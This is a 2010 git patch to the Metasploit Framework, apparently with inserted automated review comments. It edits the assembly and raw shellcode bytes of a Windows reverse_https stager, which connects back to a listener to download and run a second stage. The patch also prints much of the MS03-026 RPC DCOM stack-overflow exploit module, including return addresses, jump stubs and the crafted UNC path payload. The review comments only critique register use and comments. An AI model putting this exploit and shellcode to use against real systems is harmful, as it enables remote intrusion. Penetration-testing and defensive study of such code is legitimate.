From cd2760f2c21f19228d214315036d33eb5a2bd51f Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 3 Apr 2010 13:53:35 +0000 Subject: [PATCH] Bug fixes and size improvements for the reverse_https stager git-svn-id: file:///home/svn/framework3/trunk@9001 4d416f70-5f16-0410-b530-b9f4589650da --- .../x86/src/block/block_reverse_https.asm | 25 ++++---- .../exploits/windows/dcerpc/ms03_026_dcom.rb | 61 ++++++++++--------- .../payloads/stagers/windows/reverse_https.rb | 24 ++++---- 3 files changed, 56 insertions(+), 54 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm index ce0aa51861..aaf2adcc68 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm @@ -7,8 +7,7 @@ ; Input: EBP must be the address of 'api_call'. ; Output: EDI will be the socket for the connection to the server -; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) - +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) load_wininet: push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... @@ -69,11 +68,11 @@ httpopenrequest: mov esi, eax ; hHttpRequest httpsendrequest: - xor ebx, ebx - push ebx ; optional length - push ebx ; optional - push ebx ; dwHeadersLength - push ebx ; headers + xor edi, edi + push edi ; optional length + push edi ; optional + push edi ; dwHeadersLength + push edi ; headers push esi ; hHttpRequest push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) call ebp 
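Review bot: The `; Clobbers:` line re-added in the header hunk still lists only EAX, ESI, EDI and ESP, yet the httpsendrequest hunk on this same line now zeroes EDI as the NULL-argument scratch register and the download_more hunk further on pushes EBX as the receive buffer, so EBX is written by the block as well. Where EBX is loaded is outside the visible hunks, so confirm that before touching the header; if it holds, `; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)`. It would also help to record next to `xor edi, edi` that allocate_memory later relies on EDI still being zero (`push edi ; NULL ... zero'd from the prev function`), e.g. `; EDI is reused as NULL by allocate_memory - keep it zero`.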
@@ -84,9 +83,11 @@ check_ssl: ; In the case of an invalid certificate authority, we have to wait until the error occurs, ; set an option to disable it, then try it all over again. This wastes shellcode space, ; but its required to use this payload without a valid signed cert. - push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" ) - call ebp - cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d) +; push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" ) +; call ebp + + ; The error message is left in ECX + cmp cl, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d) jne failure ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -121,7 +122,7 @@ allocate_memory: push byte 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (8Mb ought to do us) - push ebx ; NULL as we dont care where the allocation is (zero'd from the prev function) + push edi ; NULL as we dont care where the allocation is (zero'd from the prev function) push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); @@ -133,7 +134,7 @@ download_prep: download_more: push edi ; &bytesRead - push ebx ; buffer as the length, seems to work (Win7) + push 8192 ; read length push ebx ; buffer push esi ; hRequest push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 895b129344..67f0da36fb 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
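Review bot: The check_ssl hunk leaves `; push 0x5DE2C5AA` and `; call ebp` behind as commented-out code; history already preserves them, so either delete the two lines or add a one-line reason they are kept. The new comment `; The error message is left in ECX` states as fact something the hunk does not establish: no instruction in view writes ECX before `cmp cl, 0x0d`, so the value must come from inside the preceding API call, which is an implementation detail rather than a documented return contract. Rewording it as an assumption keeps the next reader from trusting it blindly, e.g. `; Assumes the failed call leaves the error code in ECX (undocumented, not an API contract)`. The `cmp cl, 0x0d` compare also checks only the low byte of the code named in the comment (0x2f0d); if that is deliberate, one more word in the comment saying so would avoid a future "fix".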
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Microsoft RPC DCOM Interface Overflow', 'Description' => %q{ This module exploits a stack overflow in the RPCSS service, this vulnerability - was originally found by the Last Stage of Delirium research group and has been + was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :) }, @@ -47,16 +47,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 880, 'MinNops' => 300, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, - 'Targets' => + 'Targets' => [ # Target 0: Universal - [ + [ 'Windows NT SP3-6a/2000/XP/2003 Universal', { 'Platform' => 'win', - 'Rets' => + 'Rets' => [ 0x77f33723, # Windows NT 4.0 SP6a (esp) 0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0 @@ -76,27 +76,27 @@ class Metasploit3 < Msf::Exploit::Remote # Common vulnerability scanning tools report port 445/139 # due to how they test for the vulnerability. Remap this # back to 135 for automated exploitation - + rport = datastore['RPORT'].to_i if ( rport == 139 or rport == 445 ) datastore['RPORT'] = 135 end - + true end - + def exploit connect print_status("Trying target #{target.name}...") - + handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") - + # Carefully create the combination of addresses and code for cross-os exploitation xpseh = rand_text_alphanumeric(360, payload_badchars) - + # Jump to [esp-4] - (distance to shellcode) jmpsc = "\x8b\x44\x24\xfc" + # mov eax,[esp-0x4] 
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8') xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V') xpseh[ 314, jmpsc.length ] = jmpsc - + # # NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both # NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4 @@ -136,30 +136,30 @@ class Metasploit3 < Msf::Exploit::Remote # sits just below these overwrites... # - nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + - rand_text(2, payload_badchars) + nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + + rand_text(2, payload_badchars) nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V') nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V') - ntshiz = - nt4sp3jmp + - [ target['Rets'][6] ].pack('V') + + ntshiz = + nt4sp3jmp + + [ target['Rets'][6] ].pack('V') + [ target['Rets'][5] ].pack('V') + - nt4sp5jmpback + + nt4sp5jmpback + nt4sp3jmpback # Pad to the magic value of 118 bytes - ntshiz += rand_text(118 - ntshiz.length, payload_badchars) - + ntshiz += rand_text(118 - ntshiz.length, payload_badchars) + # Create the evil UNC path used in the overflow - uncpath = - Rex::Text.to_unicode("\\\\") + + uncpath = + Rex::Text.to_unicode("\\\\") + make_nops(32) + - + # When attacking NT 4.0, jump over 2000/XP return Rex::Arch::X86.jmp_short(16) + Rex::Arch::X86.jmp_short(25) + - + [ target['Rets'][2] ].pack('V') + # Return address for 2000 (ebx) [ target['Rets'][0] ].pack('V') + # Return address for NT 4.0 SP6 (esi) [ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0 @@ -172,8 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote make_nops(4) + Rex::Arch::X86.jmp_short(4) + rand_text(4, payload_badchars) + - payload.encoded + - ntshiz + + payload.encoded + + ntshiz + xpseh + Rex::Text.to_unicode("\\\x00") 
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) + NDR.long(0) + - rand_text(16) + + rand_text(16) + NDR.long(0) + NDR.long(0) + @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(1) + NDR.long(1) + NDR.long(rand(0xFFFFFFFF)) - + print_status('Sending exploit ...') begin dcerpc_call(0, stubdata) @@ -220,7 +220,8 @@ class Metasploit3 < Msf::Exploit::Remote end handler - disconnect + disconnect end end + diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 6c27708560..e890cef031 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 295, 'V' ], + 'EXITFUNC' => [ 289, 'V' ], 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian }, 'Payload' => 
@@ -49,18 +49,18 @@ module Metasploit3
 "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
 "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
 "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
- "\xFF\xD5\xEB\x64\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
- "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x4D\x59\x31\xD2" +
+ "\xFF\xD5\xEB\x5E\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+ "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x47\x59\x31\xD2" +
 "\x52\x68\x00\x32\xE0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
- "\x3B\xFF\xD5\x89\xC6\x31\xDB\x53\x53\x53\x53\x56\x68\x2D\x06\x18" +
- "\x7B\xFF\xD5\x85\xC0\x75\x36\x68\xAA\xC5\xE2\x5D\xFF\xD5\x3C\x0D" +
- "\x75\x24\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68" +
- "\x75\x46\x9E\x86\xFF\xD5\xEB\xCD\xEB\x45\xE8\xAE\xFF\xFF\xFF\x2F" +
- "\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68" +
- "\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF" +
- "\xD5\x93\x53\x53\x89\xE7\x57\x53\x53\x56\x68\x12\x96\x89\xE2\xFF" +
- "\xD5\x85\xC0\x74\xD1\x8B\x07\x01\xC3\x85\xC0\x75\xE9\x58\xC3\xE8" +
- "\x50\xFF\xFF\xFF"
+ "\x3B\xFF\xD5\x89\xC6\x31\xFF\x57\x57\x57\x57\x56\x68\x2D\x06\x18" +
+ "\x7B\xFF\xD5\x85\xC0\x75\x30\x80\xF9\x0D\x75\x24\x68\x80\x33\x00" +
+ "\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
+ "\xEB\xD3\xEB\x49\xE8\xB4\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
+ "\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00" +
+ "\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7" +
+ "\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85" +
+ "\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x52\xFF" +
+ "\xFF\xFF"
 }
 ))
 end